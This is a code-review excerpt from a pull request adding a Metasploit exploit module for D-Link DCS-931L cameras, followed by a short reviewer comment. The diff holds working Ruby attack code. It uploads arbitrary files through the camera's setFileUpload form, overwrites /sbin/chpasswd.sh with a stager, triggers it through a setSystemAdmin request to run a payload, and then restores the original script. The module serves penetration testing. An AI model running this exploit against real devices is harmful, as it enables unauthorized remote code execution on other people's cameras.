modules/exploits/linux/http/dlink_dcs931l_upload.rb

```diff
@@ -0,0 +1,196 @@
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager")
+    end
+
+    # execute payload using stub
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri('setSystemAdmin'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'vars_post' => Hash[{
+        'ReplySuccessPage' => 'advanced.htm',
+        'ReplyErrorPage' => 'errradv.htm',
+        'ConfigSystemAdmin' => 'Apply'
+      }.to_a.shuffle])
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    elsif res && res.code && res.code == 401
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    elsif res && res.code && res.code == 200 && res.body
+      print_good("#{peer} - Payload executed successfully")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed")
+    end
+  end
+
+  #
+  # Replace chpasswd.sh with original contents
+  #
+  def cleanup
+    chpasswd = <<-EOF
+#!/bin/sh
+#
+# $Id: chpasswd.sh, v1.00 2009-11-05 andy
+#
+# usage: chpasswd.sh <user name> [<password>]
+#
+
+if [ "$1" == "" ]; then
+    echo "chpasswd: no user name"
+    exit 1
+fi
+
+echo "$1:$2" > /tmp/tmpchpw
+chpasswd < /tmp/tmpchpw
+rm -f /tmp/tmpchpw
+EOF
+    res = upload('/sbin/chpasswd.sh', chpasswd)
+    if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/
+      vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully")
+    else
+      vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default")
+    end
+  end
+
+  #
+  # Upload a file to a specified path
+  #
+  def upload(path, data)
+    vprint_status("#{peer} - Writing #{data.length} bytes to #{path}")
+
+    boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}"
+    post_data  = "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"ReplySuccessPage\"\r\n"
+    post_data << "\r\nreplyuf.htm\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"ReplyErrorPage\"\r\n"
+    post_data << "\r\nreplyuf.htm\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n"
+    post_data << "\r\n#{path}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"UploadFile\"; filename=\"#{rand_text_alphanumeric(rand(8) + 5)}\"\r\n"
+    post_data << "Content-Type: application/octet-stream\r\n"
+    post_data << "\r\n#{data}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"ConfigUploadFile\"\r\n"
+    post_data << "\r\nUpload File\r\n"
+    post_data << "--#{boundary}\r\n"
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri('setFileUpload'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
```

Comment:
Same feedback in: https://github.com/rapid7/metasploit-framework/pull/6433/files#r48822057